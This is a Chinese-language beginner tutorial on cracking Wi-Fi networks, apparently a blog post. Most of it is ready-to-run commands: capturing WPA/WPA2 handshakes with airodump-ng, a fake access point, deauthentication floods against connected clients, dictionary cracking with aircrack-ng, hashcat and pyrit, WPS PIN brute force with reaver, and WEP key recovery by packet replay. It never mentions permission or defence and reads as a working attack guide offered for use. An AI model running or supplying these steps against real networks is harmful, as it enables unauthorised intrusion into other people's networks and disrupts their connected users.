[WIFI] WIFI 破解（初级）

话不多说，先来看看字典破解 wpa2 的效果

===================================

===============================================
字典破解 wifi-wpa/wpa2
目前最常用的加密类型
此方法只适合破解弱口令
其他暴力破解伤CPU/GPU
===============================================
1. 安装aircrack-ng
   1. 直接使用apt-get，但有的软件仓库不是最新版
   2. 源码安装 http://www.aircrack-ng.org/
      * 现在要翻一下才能下载

2. 无线网卡开启monitor(建议另外使用usb无线网卡)
  > sudo ifconfig wlan0 down
  > sudo iwconfig wlan0 mode monitor

3. 查看无线网络，选择对象BSSID和CHN(通道),同时记下ESSID
  > sudo airodump-ng wlan0

4. 对指定对象进行dump, 并记录连接该BSSID的STATION(CLIENTID, 也就是谁连了)
  > sudo airodump-ng -w wpa2 -c CHN --bssid BSSID wlan0
  * -w 为保存的抓包文件的前缀
  * -c 为前面记录的通道

5. 创建fake AP(可以加快获取握手报文)
  > sudo airbase-ng -a BSSID --essid ESSID -c CH -Z 4 -W 1 wlan0
    * 如果是wpa  一般是  -z 2  z小写(TKIP)
    * 如果是wpa2 一般是  -Z 4  Z大写(CCMP)

6. 向该网络内广播解除认证报文
  > sudo aireplay-ng -0 0 -a BSSID -c CLIENTID --ignore-negative-one wlan0

7. 等待handshake
  > 步骤4中右上脚显示收到handshake报文
  > 使用aircrack-ng *.cap 探测是否包含handshake
  > 当包含handshake报文时停止4,5,6

以下使用三种软件破解:
aircrack-ng
------
1. 开始破解
   > aircrack-ng *.cap -w dict
   * dict为字典文件，每一行一个密码

hashcat
-------
1. 将dump文件wpa2-01.cap转换为待破解格式文件done.hccap
   > wpaclean out.cap wpa2-01.cap
   > aircrack-ng out.cap -J done

2. 开始破解
   > hashcat -m 2500 done.hccap dict

pyrit
-------
1. 开始破解
   > pyrit -r wpa2-01.cap -i dict attack_passthrough

===========================================
通过PIN破解wifi
此方法需要wifi开启wps功能，且信号尽量好
目前大部分厂家的无线路由器默认是关闭wps的
同时也具有防PIN的功能
所以现在此方法用得不多了
===========================================

1. 网卡配置参考wpa/wpa2破解

2. 查看开启WPS的无线网络，选择对象BSSID
  > sudo airodump-ng --wps wlan0

3. 开始破解
  > sudo reaver -i wlan0 -b BSSID -vv
  * 根据实际环境可以改变pin的间隔时间

4. 漫长的等待

============================================
WEP加密方式破解
如果有WEP加密的wifi基本都可以很快破解
但是很不幸，这种加密方式已很难见到
但是还是学习下
============================================
1. 网卡配置参考wpa/wpa2破解

2. 查看无线无线网络，找到加密方式为WEP的wifi, 记录对象BSSID
  > sudo airodump-ng wlan0

3. 对指定对象进行dump
  > sudo airodump-ng -w wep -c 10 --bssid BSSID wlan0

4. 向对象发送请求以获取更多的报文
  > sudo aireplay-ng -1 0 -a BSSID wlan0
  * 此步骤可选择攻击方式很多，可以自行man一下

5. 读取网络中的报文(读取上万后即可停止)
  > sudo aireplay-ng -3 -b BSSID wlan0

6. 进行破解,利用当前目录下的.cap文件
  > aircrack-ng wep-01.cap

7. 如果第6步破解失败，则重复5-6